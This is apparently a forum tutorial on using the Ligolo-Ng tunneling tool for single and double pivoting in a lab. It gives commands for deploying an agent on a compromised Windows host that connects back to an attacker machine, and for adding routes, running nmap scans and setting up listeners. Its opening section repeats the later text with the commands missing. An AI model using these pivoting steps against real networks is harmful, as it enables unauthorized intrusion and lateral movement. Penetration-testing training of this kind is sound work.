- by x32x01 ||
Ligolo-Ng is a powerful tunneling tool used in penetration testing and red team engagements to perform lateral movement inside internal networks.
In this detailed guide, you’ll learn how Ligolo-Ng works, how to set it up, and how to perform single and double pivoting in a controlled lab environment.
⚠️ Important: This guide is strictly for authorized penetration testing, cybersecurity labs, and educational purposes. Never test systems without proper permission.
Key features:
Verify:
This creates the virtual interface used for tunneling.
View options:
Start proxy with self-signed certificate:
Default listening port:
Once executed, a session will appear on the Kali proxy.
Use:
Select session and run:
This reveals internal network interfaces.
Now you can:
Single pivoting is now complete.
A new session will appear.
Switch to session 2 and start:
This enables traffic forwarding across both pivots.
Now you can scan Network C:
Double pivoting successfully established.
Unauthorized access is illegal and unethical.
Its speed, flexibility, and VPN-like tunneling make it ideal for advanced lateral movement and internal reconnaissance in controlled environments.
If you’re preparing for red team certifications or real-world penetration testing, mastering Ligolo-Ng will significantly improve your internal network exploitation skills.
Stay ethical. Stay authorized. Stay professional 🛡️🔥
In this detailed guide, you’ll learn how Ligolo-Ng works, how to set it up, and how to perform single and double pivoting in a controlled lab environment.
⚠️ Important: This guide is strictly for authorized penetration testing, cybersecurity labs, and educational purposes. Never test systems without proper permission.
What Is Ligolo-Ng? 🧠
Ligolo-Ng is a lightweight tunneling tool developed by Nicolas Chatelain. It creates reverse TCP/TLS tunnels using a TUN interface, allowing attackers (or testers) to pivot across networks without relying on SOCKS proxies.Key features:
- Written in Go (fast and portable) ⚡
- Reverse TCP/TLS tunneling 🔒
- TUN interface support (VPN-like behavior) 🌐
- Supports ICMP, UDP, SYN scans
- High-speed connections (up to 100 Mbps)
- Minimal footprint on target systems
Ligolo-Ng vs Chisel 🔍
Both Ligolo and Chisel are pivoting tools, but there are differences:- Ligolo-Ng is faster and more flexible
- Chisel uses a classic client-server SOCKS model
- Ligolo uses a TUN interface (acts like a VPN tunnel)
- Ligolo supports ICMP, UDP, SYN scanning
- Chisel primarily relies on HTTP/WebSocket
Lab Setup Overview 🖥️
Typical lab scenario:- Attacker machine (Kali Linux)
- Compromised Windows machine (Network B)
- Another internal network (Network C)
- Perform Single Pivot (Network A → Network B)
- Perform Double Pivot (Network A → Network B → Network C)
Installing and Setting Up Ligolo-Ng ⚙️
Step 1: Create TUN Interface on Kali
Code:
ip tuntap add user root mode tun ligolo
ip link set ligolo up Code:
ifconfig Step 2: Extract the Proxy File
Code:
tar -xvzf ligolo-ng_proxy_0.5.1_linux_amd64.tar.gz Code:
./proxy -h Code:
./proxy -selfcert 11601Step 3: Deploy Agent on Target (Windows)
Extract the agent file on Windows and run: Code:
agent.exe -connect 192.168.1.5:11601 -ignore-cert Use:
Code:
session Code:
ifconfig Single Pivoting Using Ligolo-Ng 🔄
Goal: Access Network B from Network A.Step 1: Add Route
If internal network is 192.168.148.0/24: Code:
ip route add 192.168.148.0/24 dev ligolo
ip route list Step 2: Start Tunnel
Inside proxy session: Code:
start - Ping internal hosts
- Run Nmap scans
- Perform enumeration
Code:
nmap -sC -sV 192.168.148.132 Double Pivoting with Ligolo-Ng 🔁
Goal: Reach Network C via Network B.Step 1: Gain Access to Second Internal Machine
After accessing Network B, upload and execute the Ligolo agent on a second internal Windows machine. Code:
agent.exe -connect 192.168.1.5:11601 -ignore-cert Step 2: Add Route for Network C
If new network is 192.168.159.0/24: Code:
ip route add 192.168.159.0/24 dev ligolo
ip route list Step 3: Stop First Tunnel
Inside session 1: Code:
stop Code:
start Step 4: Add Listener for Double Pivot
Code:
listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4444 Now you can scan Network C:
Code:
nmap 192.168.159.0/24 Why Ligolo-Ng Is Powerful for Red Teaming 🎯
Ligolo-Ng enables:- Internal network enumeration
- Cross-subnet scanning
- Pivot chaining
- Active Directory lateral movement
- Multi-hop access
Security & Ethical Usage Reminder 🔐
Ligolo-Ng is designed for:- Authorized penetration tests
- Red team operations
- Cybersecurity labs
- Training and certification practice
Unauthorized access is illegal and unethical.
Final Thoughts 💡
Ligolo-Ng is one of the most efficient and modern pivoting tools available for cybersecurity professionals.Its speed, flexibility, and VPN-like tunneling make it ideal for advanced lateral movement and internal reconnaissance in controlled environments.
If you’re preparing for red team certifications or real-world penetration testing, mastering Ligolo-Ng will significantly improve your internal network exploitation skills.
Stay ethical. Stay authorized. Stay professional 🛡️🔥
Last edited: